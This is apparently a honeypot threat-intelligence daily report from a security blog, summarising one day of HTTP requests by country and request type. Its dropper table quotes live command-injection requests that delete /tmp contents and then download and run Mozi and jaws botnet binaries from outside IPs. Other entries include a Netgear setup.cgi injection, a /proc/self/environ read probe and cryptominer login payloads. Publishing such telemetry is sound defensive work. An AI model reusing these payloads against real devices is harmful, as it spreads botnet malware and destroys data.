Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-05-14

·403 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-14
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 19 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1098 requests were recorded during the day, originating from 5 different countries, with a peak of 215 requests coming from BG.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia
FRGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
47.93.212.99GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsselfrep;chmod+777+/tmp/jawsselfrep;sh+/tmp/jaws.selfrep HTTP/1.1
115.63.240.10127;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
156.212.104.100GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
60.23.232.109GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://60.23.232.109:37651/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.42.243.6GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.10.146.242:56641/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
694GET /goform/formJsonAjaxReq HTTP/1.1
773GET /@fs/proc/self/environ?raw?? HTTP/1.1
1221GET /OZGl HTTP/1.1
1291POST /api/user/binLookup?time=1747193185668050900 HTTP/1.1
1301GET /api/bin/440393?time=1747193184575167987 HTTP/1.1
1311GET /config/index?time=1747192974832206021 HTTP/1.1
1321GET /9VWw HTTP/1.1
1331GET /Y6al HTTP/1.1
1851GET /socket.io/1/?t=1747236057213 HTTP/1.1
1871GET /stalker_portal/c HTTP/1.1
1931HEAD /files.rar HTTP/1.1
2071GET /www/.git HTTP/1.1
2171GET /9Dop HTTP/1.1
2181GET /VHGx HTTP/1.1
2511{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x224967iFVimMwZ41gfEG2S5aYTBPDMYwJ9LRJQyepwyggnfUYMgkdqAjB25N7JKCmmS3BqummF2gEbDNnAXBh513zxQqPdwE5\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
2521{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x120dc7ce9f5d58d67c2d3c96da8e1a3b6d0fffbe\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
2631GET /cfg/test HTTP/1.1
2701CONNECT ipinfo.io:443 HTTP/1.1
3201GET /CNzR HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0215BG
1213US
2147GB
366NL
462CH
550PL
649BE
742SC
835FR
933ES
1024CN
1118DE
1213LT
1313KR
1412AZ
1512SG
1611PT
179NG
187GH
195RU
205TH
215JP
225IT
235UA
244BR
254CA
264IL
274TR
283VN
293ID
303IN
312HK
322TW
332IR
342CZ
352VE
362AU
371EG
381MD
391CY
401GE
411ZA

Related

Report: 2025-05-13
·323 words
Repport Daily
Report: 2025-05-12
·494 words
Repport Daily
Report: 2025-05-11
·1570 words
Repport Daily